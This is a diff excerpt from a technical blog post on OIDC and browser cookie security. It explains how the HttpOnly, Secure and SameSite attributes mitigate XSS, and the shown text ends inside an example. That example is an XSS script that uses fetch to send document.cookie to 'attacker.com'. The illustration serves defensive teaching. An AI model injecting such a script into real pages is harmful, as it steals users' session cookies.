copdips/copdips.github.io/docs/posts/2025/2025-11-18-oidc-openid-connect.md

     - **2020s**: We realized Local Storage is dangerous (XSS attacks).
 Now, the industry is moving back to Cookies ("The Legacy Way"), but using them to hold modern JWTs.
 And with HttpOnly cookies stored in the browser's cookie store (in memory for session cookies or on disk to browser's SQLite DB for e.g. if persistent cookie with the `Expires` or `Max-Age` attribute), they are not accessible to JavaScript, mitigating XSS risks.

-**Securing Cookies in Modern Authentication:**
+#### Securing Cookies in Modern Authentication

+!!! warning "It's secure ONLY IF your browser, underlying OS, device, the network layer, even the target servers are secure"

-The warning's mention of HttpOnly, Secure, and SameSite attributes is key to modern cookie security.
+`HttpOnly`, `Secure`, and `SameSite` cookie attributes is key to modern cookie security.
 Here's how they work together to mitigate risks:

 - `HttpOnly`: This attribute makes a cookie inaccessible to client-side JavaScript (document.cookie API).
-This is your primary defense against `XSS` (Cross-Site Scripting) attacks, as it prevents malicious scripts from stealing session cookies.
+This is your primary defense against `XSS` (Cross-Site Scripting) attacks, as it prevents malicious scripts from stealing session cookies. **Attacker cannot read the cookie**.

     !!! note "Example: XSS (Cross-Site Scripting) Attack"

         1. Attacker injects malicious script into a vulnerable web page.

             ```html title="Example: XSS Cross-Site Scripting Attack"
             <script>
                 fetch('https://attacker.com/steal?cookie=' + document.cookie)
             </script>